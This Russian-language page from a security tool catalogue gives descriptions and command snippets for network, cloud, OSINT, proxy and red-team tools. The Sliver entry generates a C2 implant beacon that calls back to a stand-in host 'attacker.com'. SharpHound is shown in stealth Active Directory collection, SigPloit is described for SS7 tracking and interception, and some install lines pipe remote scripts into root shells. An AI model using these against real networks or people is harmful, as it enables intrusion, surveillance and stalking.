Каталог инструментов

325 инструментов

Scapy

v2.7.0
Network Analysis

Мощная Python-библиотека и интерактивная оболочка для работы с сетевыми пакетами. Позволяет создавать, отправлять, перехватывать и анализировать пакеты любого протокола. Возможности: - Создание пакетов любого протокола: Ethernet, IP, TCP, …

# pip: pip install scapy # apt (с дополнениями): sudo apt install python3-scapy # Запустить интерактивный режим: sudo scapy # Примеры: # Ping: >>> send(IP(dst="8.8.8.8")/ICMP()) # ARP-сканирование подсети: >>> ans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"), timeout=2)[0] >>> for r in ans: print(r[1].psrc, r[1].hwsrc) # Собственный TCP SYN: >>> sr1(IP(dst="target.com")/TCP(dport=80, flags="S")) # Читать PCAP: >>> pkts = rdpcap("capture.pcap")

ScoutSuite

v5.14.0
Cloud & Container Security

Мультиоблачный инструмент аудита безопасности от NCC Group. Поддерживает AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud. Анализирует конфигурации сотен сервисов: IAM, сети, хранилища, базы данных. Генерирует HTML-отчёт с детализацией …

pip install scoutsuite # AWS scout aws # Azure scout azure --cli # GCP scout gcp --user-account

Semgrep

v1.171.0
Exploitation

Молниеносный статический анализатор кода с человекочитаемым синтаксисом правил (похож на сам код, а не на regex): находит реальные уязвимости и антипаттерны в десятках языков за секунды на кодовых …

pip install semgrep semgrep --config auto /path/to/code semgrep --config "p/security-audit" .

Shadowsocks-rust

v1.24.0
Anonymizers ★ featured

Быстрейшая реализация протокола Shadowsocks на Rust с поддержкой AEAD-шифрования (AES-256-GCM, ChaCha20-Poly1305). Трафик выглядит как случайный поток байт — DPI-системы провайдера не могут идентифицировать протокол и заблокировать соединение. Режимы: …

# Установка cargo install shadowsocks-rust # или бинарники на GitHub Releases # Конфиг клиента (config.json) # {"server":"my.server.com","server_port":8388, # "password":"pass","method":"aes-256-gcm"} sslocal -c config.json # Теперь SOCKS5-прокси на 127.0.0.1:1080

SharpHound

v2.13.0
Post-Exploitation

Коллектор данных для BloodHound: собирает информацию об Active Directory — пользователи, группы, компьютеры, сессии, ACL, GPO, trust relationships. Работает как C#-агент в домене. Вывод в формате JSON/ZIP для …

# Скачать с GitHub Releases: # https://github.com/BloodHoundAD/SharpHound/releases SharpHound.exe -c All SharpHound.exe -c DCOnly # быстрый режим, только DC SharpHound.exe -c All --stealth # скрытный режим # Через PowerShell: Import-Module ./SharpHound.ps1 Invoke-BloodHound -CollectionMethod All

Sherlock

v0.16.0
Reconnaissance

OSINT-инструмент для поиска username-ов на сотнях платформ одновременно. Позволяет быстро установить цифровой след человека: найти аккаунты в соцсетях, форумах, игровых платформах и специализированных сайтах. Возможности: - Поиск по …

# pip: pip install sherlock-project # из репозитория: git clone https://github.com/sherlock-project/sherlock cd sherlock pip install . # Примеры: # Поиск одного ника: sherlock username # Несколько ников: sherlock user1 user2 user3 # С прокси и сохранением результатов: sherlock --proxy socks5://127.0.0.1:9050 --output results.txt username # Только найденные (без ошибок): sherlock --print-found username # CSV-вывод: sherlock --csv username

Shodan CLI

v1.28.0
Reconnaissance

Официальный Python CLI для Shodan — поискового движка устройств в интернете. Поиск по баннерам/сервисам, информация об IP, мониторинг изменений, alert-уведомления. Незаменим для разведки attack surface организации: открытые порты, …

pip install shodan shodan init YOUR_API_KEY shodan search "product:nginx country:RU" shodan host 8.8.8.8

SigPloit

v1.0
Wireless & RF ★ featured

Фреймворк для тестирования сигнальных протоколов телекоммуникационных сетей: SS7, Diameter, GTP, SIP. Позволяет проводить атаки на отслеживание местоположения, перехват SMS/звонков, DoS на HLR/VLR. Проверяет защищённость операторских сетей.

git clone https://github.com/SigPloiter/SigPloit cd SigPloit && pip install -r requirements.txt # Запуск: python sigploit.py

Sing-box

v1.13.14
Anonymizers ★ featured

Универсальная платформа для построения прокси-туннелей следующего поколения. Поддерживает десятки протоколов в одном бинарнике: VLESS+Reality, VMess, Trojan, Shadowsocks, Hysteria2, TUIC, NaiveProxy, Tor, WireGuard. Единый JSON-конфиг с правилами маршрутизации, DNS, …

# Установка bash <(curl -fsSL https://sing-box.app/deb-install.sh) # или: go install github.com/sagernet/sing-box/cmd/sing-box@latest # Запуск sing-box run -c config.json # Пример — клиент с VLESS+Reality: # {"outbounds":[{"type":"vless","server":"...","tls":{"reality":{"enabled":true}}}]}

Slither

v0.11.5
Blockchain / Web3

Статический анализатор смарт-контрактов Solidity от Trail of Bits. 80+ детекторов: reentrancy, integer overflow, tx.origin authentication, unprotected SELFDESTRUCT, shadowing переменных. Строит граф вызовов, inheritance, выполняет taint-анализ. Интегрируется в CI/CD …

pip install slither-analyzer # Анализ проекта Hardhat/Foundry slither . # Конкретный контракт slither contract.sol # JSON-вывод для CI slither . --json results.json

Sliver

v1.7.3
Exploitation

Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, …

# Скачать бинарь сервера: # https://github.com/BishopFox/sliver/releases # Linux (быстрый старт): curl https://sliver.sh/install | sudo bash # Запустить сервер: sudo sliver-server # В консоли Sliver: # Создать имплант (beacon): generate beacon --mtls attacker.com --os windows --arch amd64 # Запустить listener: mtls # Ждать подключения: beacons use <beacon-id> ls / whoami / shell

SmartBugs

v2.1.1
Blockchain / Web3

Фреймворк для запуска нескольких инструментов анализа смарт-контрактов (Mythril, Slither, Oyente, Manticore и др.) параллельно и сравнения их результатов. Автоматизирует аудит по нескольким движкам с единым отчётом.

git clone https://github.com/smartbugs/smartbugs cd smartbugs install/setup-venv.sh # Анализ контракта всеми инструментами ./smartbugs -t all -f contracts/MyContract.sol # Только Mythril + Slither ./smartbugs -t mythril slither -f MyContract.sol # JSON-вывод результатов ./smartbugs -t slither -f MyContract.sol ./reparse results ./results2csv -p results > results.csv